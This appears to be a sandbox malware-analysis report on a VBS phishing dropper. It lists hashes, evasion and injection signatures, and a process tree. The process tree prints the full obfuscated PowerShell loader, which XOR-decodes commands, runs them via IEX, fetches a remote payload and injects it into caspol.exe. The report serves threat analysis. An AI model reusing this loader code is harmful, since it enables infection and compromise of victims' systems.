Analysis
-
max time kernel
171s -
max time network
175s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
09-02-2023 02:13
Static task
static1
Behavioral task
behavioral1
Sample
New items order.vbs
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
New items order.vbs
Resource
win10v2004-20220812-en
General
-
Target
New items order.vbs
-
Size
53KB
-
MD5
68a4d5e4c541961d428996136e9739aa
-
SHA1
ac722c0b712636eb7efbd995035dd149311e0ee9
-
SHA256
0dadaf0eb1832bfa87259ffa7481ab5cfdd40455dd6643858f856afceaf17c14
-
SHA512
379d322247d03e9826ff4bc0de5a849da314f8631b59f0ccf36949e98999f11b84ad564f84e7497755eb333aa0c82381e844a16f6fc533fcec86ddb710e6d517
-
SSDEEP
1536:Y7ApYVwpqGY8n/pevDkFwjYkRaSQSAykbhATO4RWKIRJRa:Y7ApYVIsvDkajJUSaxF4Rj2fa
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
WScript.exepowershell.exeflow pid process 3 2288 WScript.exe 16 4356 powershell.exe 23 4356 powershell.exe 26 4356 powershell.exe -
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
Processes:
caspol.exepowershell.exedescription ioc process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe caspol.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.execaspol.exepid process 4356 powershell.exe 1008 caspol.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4356 set thread context of 1008 4356 powershell.exe caspol.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
WScript.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 WScript.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 4600 powershell.exe 4600 powershell.exe 4356 powershell.exe 4356 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 4356 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4600 powershell.exe Token: SeDebugPrivilege 4356 powershell.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 2288 wrote to memory of 3068 2288 WScript.exe cmd.exe PID 2288 wrote to memory of 3068 2288 WScript.exe cmd.exe PID 2288 wrote to memory of 4104 2288 WScript.exe cmd.exe PID 2288 wrote to memory of 4104 2288 WScript.exe cmd.exe PID 2288 wrote to memory of 4600 2288 WScript.exe powershell.exe PID 2288 wrote to memory of 4600 2288 WScript.exe powershell.exe PID 4600 wrote to memory of 4356 4600 powershell.exe powershell.exe PID 4600 wrote to memory of 4356 4600 powershell.exe powershell.exe PID 4600 wrote to memory of 4356 4600 powershell.exe powershell.exe PID 4356 wrote to memory of 1008 4356 powershell.exe caspol.exe PID 4356 wrote to memory of 1008 4356 powershell.exe caspol.exe PID 4356 wrote to memory of 1008 4356 powershell.exe caspol.exe PID 4356 wrote to memory of 1008 4356 powershell.exe caspol.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\New items order.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo off2⤵PID:3068
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo rshell2⤵PID:4104
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Illuminist = """Function Endpaper2211 { param([String]`$Bissedesty); `$Tryk = ''; Write-Host `$Tryk; Write-Host `$Tryk; Write-Host `$Tryk; `$Bollen = New-Object byte[] (`$Bissedesty.Length / 2); For(`$blemos=0; `$blemos -lt `$Bissedesty.Length; `$blemos+=2){ `$Bollen[`$blemos/2] = [convert]::ToByte(`$Bissedesty.Substring(`$blemos, 2), 16); `$Afri = (`$Bollen[`$blemos/2] -bxor 116); `$Bollen[`$blemos/2] = `$Afri; } [String][System.Text.Encoding]::ASCII.GetString(`$Bollen);}`$Prog0=Endpaper2211 '270D070011195A101818';`$Prog1=Endpaper2211 '391D17061B071B12005A231D1A47465A211A071512113A15001D02113911001C1B1007';`$Prog2=Endpaper2211 '33110024061B1735101006110707';`$Prog3=Endpaper2211 '270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A101811261112';`$Prog4=Endpaper2211 '0700061D1A13';`$Prog5=Endpaper2211 '331100391B100118113C151A101811';`$Prog6=Endpaper2211 '2620270411171D15183A15191158543C1D1011360D271D135854240116181D17';`$Prog7=Endpaper2211 '26011A001D1911585439151A15131110';`$Prog8=Endpaper2211 '2611121811170011103011181113150011';`$Prog9=Endpaper2211 '3D1A3911191B060D391B10011811';`$Overnou0=Endpaper2211 '390D3011181113150011200D0411';`$Overnou1=Endpaper2211 '37181507075854240116181D1758542711151811105854351A071D371815070758543501001B3718150707';`$Overnou2=Endpaper2211 '3D1A021B1F11';`$Overnou3=Endpaper2211 '240116181D1758543C1D1011360D271D1358543A110327181B005854221D0600011518';`$Overnou4=Endpaper2211 '221D06000115183518181B17';`$Overnou5=Endpaper2211 '1A00101818';`$Overnou6=Endpaper2211 '3A0024061B00111700221D06000115183911191B060D';`$Overnou7=Endpaper2211 '3D312C';`$Overnou8=Endpaper2211 '28';`$Skaaltal=Endpaper2211 '212731264746';`$telefonk=Endpaper2211 '37151818231D1A101B0324061B1735';function fkp {Param (`$Udst, `$Tractorske13) ;`$Journeycak0 =Endpaper2211 '503D1A10065449545C2F350404301B19151D1A294E4E37010606111A00301B19151D1A5A331100350707111916181D11075C5D540854231C110611593B161E111700540F54502B5A33181B161518350707111916180D3715171C115459351A1054502B5A381B1715001D1B1A5A2704181D005C503B0211061A1B014C5D2F5945295A3105011518075C5024061B13445D54095D5A331100200D04115C5024061B13455D';.(`$Overnou7) `$Journeycak0;`$Journeycak5 = Endpaper2211 '502D1A131811100D1300544954503D1A10065A3311003911001C1B105C5024061B134658542F200D04112F292954345C5024061B134758545024061B13405D5D';.(`$Overnou7) `$Journeycak5;`$Journeycak1 = Endpaper2211 '06110001061A54502D1A131811100D13005A3D1A021B1F115C501A0118185854345C2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A101811261112295C3A1103593B161E11170054270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A1018112611125C5C3A1103593B161E111700543D1A002400065D58545C503D1A10065A3311003911001C1B105C5024061B13415D5D5A3D1A021B1F115C501A0118185854345C50211007005D5D5D5D58545020061517001B06071F1145475D5D';.(`$Overnou7) `$Journeycak1;}function GDT {Param ([Parameter(Position = 0, Mandatory = `$True)] [Type[]] `$Ullagoneae,[Parameter(Position = 1)] [Type] `$Cavourshin = [Void]);`$Journeycak2 = Endpaper2211 '50191507001B105449542F350404301B19151D1A294E4E37010606111A00301B19151D1A5A3011121D1A11300D1A15191D17350707111916180D5C5C3A1103593B161E11170054270D070011195A261112181117001D1B1A5A350707111916180D3A1519115C5024061B134C5D5D58542F270D070011195A261112181117001D1B1A5A31191D005A350707111916180D36011D18101106351717110707294E4E26011A5D5A3011121D1A11300D1A15191D17391B100118115C5024061B134D58545012151807115D5A3011121D1A11200D04115C503B0211061A1B01445854503B0211061A1B014558542F270D070011195A390118001D171507003011181113150011295D';.(`$Overnou7) `$Journeycak2;`$Journeycak3 = Endpaper2211 '50191507001B105A3011121D1A11371B1A0700060117001B065C5024061B134258542F270D070011195A261112181117001D1B1A5A371518181D1A13371B1A02111A001D1B1A07294E4E2700151A1015061058545021181815131B1A1115115D5A2711003D1904181119111A0015001D1B1A32181513075C5024061B13435D';.(`$Overnou7) `$Journeycak3;`$Journeycak4 = Endpaper2211 '50191507001B105A3011121D1A113911001C1B105C503B0211061A1B01465854503B0211061A1B01475854503715021B0106071C1D1A58545021181815131B1A1115115D5A2711003D1904181119111A0015001D1B1A32181513075C5024061B13435D';.(`$Overnou7) `$Journeycak4;`$Journeycak5 = Endpaper2211 '06110001061A5450191507001B105A370611150011200D04115C5D';.(`$Overnou7) `$Journeycak5 ;}`$Prot = Endpaper2211 '1F11061A11184746';`$Endpaper2203 = Endpaper2211 '331100371B1A071B1811231D1A101B03';`$Endpaper2200=Endpaper2211 '271C1B03231D1A101B03';`$Endpaper2201 = Endpaper2211 '50261B181811181D0700114541475449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F045450271F1515180015185450311A100415041106464644445D58545C33302054345C2F3D1A002400062958542F213D1A004746295D545C2F3D1A00240006295D5D5D';.(`$Overnou7) `$Endpaper2201;`$Endpaper2202 = Endpaper2211 '5035181811131D151A5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F04545024061B005450311A100415041106464644475D58545C33302054345C2F3D1A00240006295D545C2F3D1A00240006295D5D5D';.(`$Overnou7) `$Endpaper2202;`$Journeycak7 = Endpaper2211 '5007001E105449545035181811131D151A5A3D1A021B1F115C445D';.(`$Overnou7) `$Journeycak7;`$Journeycak7 = Endpaper2211 '50261B181811181D0700114541475A3D1A021B1F115C5007001E105854445D';.(`$Overnou7) `$Journeycak7;`$Journeycak6 = Endpaper2211 '50241B0401181D5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F04545024061B0054503B0211061A1B01405D58545C33302054345C2F3D1A002400062958542F213D1A0047462958542F213D1A0047462958542F213D1A004746295D545C2F3D1A00240006295D5D5D';.(`$Overnou7) `$Journeycak6;`$Skinli = fkp `$Overnou5 `$Overnou6;`$Journeycak7 = Endpaper2211 '5020061D171C46464D4754495450241B0401181D5A3D1A021B1F115C2F3D1A00240006294E4E2E11061B585442414C5854440C474444445854440C40445D';.(`$Overnou7) `$Journeycak7;`$Journeycak8 = Endpaper2211 '50391517171B161B54495450241B0401181D5A3D1A021B1F115C2F3D1A00240006294E4E2E11061B5854454D4D424C4444445854440C474444445854440C405D';.(`$Overnou7) `$Journeycak8;`$Endpaper2201 = Endpaper2211 '1C000004074E5B5B10061D02115A131B1B1318115A171B195B01174B110C041B060049101B031A181B1510521D104945163925042320073C4319423B2227360E0E0C3C1D3825193D392E101519450515';`$Endpaper2200 = Endpaper2211 '503C0118025449545C3A1103593B161E111700543A11005A23111637181D111A005D5A301B031A181B15102700061D1A135C50311A100415041106464644455D';`$Journeycak8 = Endpaper2211 '5020061D171C46464D464950111A024E15040410150015';.(`$Overnou7) `$Journeycak8;`$Trich2292=`$Trich2292+'\Micro.dat';`$Hulv='';if (-not(Test-Path `$Trich2292)) {while (`$Hulv -eq '') {.(`$Overnou7) `$Endpaper2200;Start-Sleep 5;}Set-Content `$Trich2292 `$Hulv;}`$Hulv = Get-Content `$Trich2292;`$Journeycak9 = Endpaper2211 '503E1B01061A110D17151F5449542F270D070011195A371B1A02110600294E4E32061B193615071142402700061D1A135C503C0118025D';.(`$Overnou7) `$Journeycak9;`$Hulv0 = Endpaper2211 '2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E371B040D5C503E1B01061A110D17151F5854445854545020061D171C46464D47585442414C5D';.(`$Overnou7) `$Hulv0;`$politiks=`$Journeycak.count-658;`$Hulv1 = Endpaper2211 '2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E371B040D5C503E1B01061A110D17151F585442414C585450391517171B161B585450041B181D001D1F075D';.(`$Overnou7) `$Hulv1;`$Hulv2 = Endpaper2211 '50350718151A00031D5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F045450271F151518001518545000111811121B1A1F5D58545C33302054345C2F3D1A002400062958542F3D1A002400062958542F3D1A002400062958542F3D1A002400062958542F3D1A00240006295D545C2F3D1A00240006295D5D5D';.(`$Overnou7) `$Hulv2;`$Hulv3 = Endpaper2211 '50350718151A00031D5A3D1A021B1F115C5020061D171C46464D475850391517171B161B5850271F1D1A181D584458445D';.(`$Overnou7) `$Hulv3#;""";Function Hulv9 { param([String]$Bissedesty); For($blemos=0; $blemos -lt $Bissedesty.Length-1; $blemos+=(0+1)){$Endpaper22 = $Endpaper22 + $Bissedesty.Substring($blemos, 1)}; $Endpaper22;}$Jyngine0 = Hulv9 'IEX ';$Jyngine1= Hulv9 $Illuminist;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Jyngine1 ;}else{.$Jyngine0 $Jyngine1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Endpaper2211 { param([String]$Bissedesty); $Tryk = ''; Write-Host $Tryk; Write-Host $Tryk; Write-Host $Tryk; $Bollen = New-Object byte[] ($Bissedesty.Length / 2); For($blemos=0; $blemos -lt $Bissedesty.Length; $blemos+=2){ $Bollen[$blemos/2] = [convert]::ToByte($Bissedesty.Substring($blemos, 2), 16); $Afri = ($Bollen[$blemos/2] -bxor 116); $Bollen[$blemos/2] = $Afri; } [String][System.Text.Encoding]::ASCII.GetString($Bollen);}$Prog0=Endpaper2211 '270D070011195A101818';$Prog1=Endpaper2211 '391D17061B071B12005A231D1A47465A211A071512113A15001D02113911001C1B1007';$Prog2=Endpaper2211 '33110024061B1735101006110707';$Prog3=Endpaper2211 '270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A101811261112';$Prog4=Endpaper2211 '0700061D1A13';$Prog5=Endpaper2211 '331100391B100118113C151A101811';$Prog6=Endpaper2211 '2620270411171D15183A15191158543C1D1011360D271D135854240116181D17';$Prog7=Endpaper2211 '26011A001D1911585439151A15131110';$Prog8=Endpaper2211 '2611121811170011103011181113150011';$Prog9=Endpaper2211 '3D1A3911191B060D391B10011811';$Overnou0=Endpaper2211 '390D3011181113150011200D0411';$Overnou1=Endpaper2211 '37181507075854240116181D1758542711151811105854351A071D371815070758543501001B3718150707';$Overnou2=Endpaper2211 '3D1A021B1F11';$Overnou3=Endpaper2211 '240116181D1758543C1D1011360D271D1358543A110327181B005854221D0600011518';$Overnou4=Endpaper2211 '221D06000115183518181B17';$Overnou5=Endpaper2211 '1A00101818';$Overnou6=Endpaper2211 '3A0024061B00111700221D06000115183911191B060D';$Overnou7=Endpaper2211 '3D312C';$Overnou8=Endpaper2211 '28';$Skaaltal=Endpaper2211 '212731264746';$telefonk=Endpaper2211 '37151818231D1A101B0324061B1735';function fkp {Param ($Udst, $Tractorske13) ;$Journeycak0 =Endpaper2211 '503D1A10065449545C2F350404301B19151D1A294E4E37010606111A00301B19151D1A5A331100350707111916181D11075C5D540854231C110611593B161E111700540F54502B5A33181B161518350707111916180D3715171C115459351A1054502B5A381B1715001D1B1A5A2704181D005C503B0211061A1B014C5D2F5945295A3105011518075C5024061B13445D54095D5A331100200D04115C5024061B13455D';.($Overnou7) $Journeycak0;$Journeycak5 = Endpaper2211 '502D1A131811100D1300544954503D1A10065A3311003911001C1B105C5024061B134658542F200D04112F292954345C5024061B134758545024061B13405D5D';.($Overnou7) $Journeycak5;$Journeycak1 = Endpaper2211 '06110001061A54502D1A131811100D13005A3D1A021B1F115C501A0118185854345C2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A101811261112295C3A1103593B161E11170054270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A1018112611125C5C3A1103593B161E111700543D1A002400065D58545C503D1A10065A3311003911001C1B105C5024061B13415D5D5A3D1A021B1F115C501A0118185854345C50211007005D5D5D5D58545020061517001B06071F1145475D5D';.($Overnou7) $Journeycak1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Ullagoneae,[Parameter(Position = 1)] [Type] $Cavourshin = [Void]);$Journeycak2 = Endpaper2211 '50191507001B105449542F350404301B19151D1A294E4E37010606111A00301B19151D1A5A3011121D1A11300D1A15191D17350707111916180D5C5C3A1103593B161E11170054270D070011195A261112181117001D1B1A5A350707111916180D3A1519115C5024061B134C5D5D58542F270D070011195A261112181117001D1B1A5A31191D005A350707111916180D36011D18101106351717110707294E4E26011A5D5A3011121D1A11300D1A15191D17391B100118115C5024061B134D58545012151807115D5A3011121D1A11200D04115C503B0211061A1B01445854503B0211061A1B014558542F270D070011195A390118001D171507003011181113150011295D';.($Overnou7) $Journeycak2;$Journeycak3 = Endpaper2211 '50191507001B105A3011121D1A11371B1A0700060117001B065C5024061B134258542F270D070011195A261112181117001D1B1A5A371518181D1A13371B1A02111A001D1B1A07294E4E2700151A1015061058545021181815131B1A1115115D5A2711003D1904181119111A0015001D1B1A32181513075C5024061B13435D';.($Overnou7) $Journeycak3;$Journeycak4 = Endpaper2211 '50191507001B105A3011121D1A113911001C1B105C503B0211061A1B01465854503B0211061A1B01475854503715021B0106071C1D1A58545021181815131B1A1115115D5A2711003D1904181119111A0015001D1B1A32181513075C5024061B13435D';.($Overnou7) $Journeycak4;$Journeycak5 = Endpaper2211 '06110001061A5450191507001B105A370611150011200D04115C5D';.($Overnou7) $Journeycak5 ;}$Prot = Endpaper2211 '1F11061A11184746';$Endpaper2203 = Endpaper2211 '331100371B1A071B1811231D1A101B03';$Endpaper2200=Endpaper2211 '271C1B03231D1A101B03';$Endpaper2201 = Endpaper2211 '50261B181811181D0700114541475449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F045450271F1515180015185450311A100415041106464644445D58545C33302054345C2F3D1A002400062958542F213D1A004746295D545C2F3D1A00240006295D5D5D';.($Overnou7) $Endpaper2201;$Endpaper2202 = Endpaper2211 '5035181811131D151A5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F04545024061B005450311A100415041106464644475D58545C33302054345C2F3D1A00240006295D545C2F3D1A00240006295D5D5D';.($Overnou7) $Endpaper2202;$Journeycak7 = Endpaper2211 '5007001E105449545035181811131D151A5A3D1A021B1F115C445D';.($Overnou7) $Journeycak7;$Journeycak7 = Endpaper2211 '50261B181811181D0700114541475A3D1A021B1F115C5007001E105854445D';.($Overnou7) $Journeycak7;$Journeycak6 = Endpaper2211 '50241B0401181D5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F04545024061B0054503B0211061A1B01405D58545C33302054345C2F3D1A002400062958542F213D1A0047462958542F213D1A0047462958542F213D1A004746295D545C2F3D1A00240006295D5D5D';.($Overnou7) $Journeycak6;$Skinli = fkp $Overnou5 $Overnou6;$Journeycak7 = Endpaper2211 '5020061D171C46464D4754495450241B0401181D5A3D1A021B1F115C2F3D1A00240006294E4E2E11061B585442414C5854440C474444445854440C40445D';.($Overnou7) $Journeycak7;$Journeycak8 = Endpaper2211 '50391517171B161B54495450241B0401181D5A3D1A021B1F115C2F3D1A00240006294E4E2E11061B5854454D4D424C4444445854440C474444445854440C405D';.($Overnou7) $Journeycak8;$Endpaper2201 = Endpaper2211 '1C000004074E5B5B10061D02115A131B1B1318115A171B195B01174B110C041B060049101B031A181B1510521D104945163925042320073C4319423B2227360E0E0C3C1D3825193D392E101519450515';$Endpaper2200 = 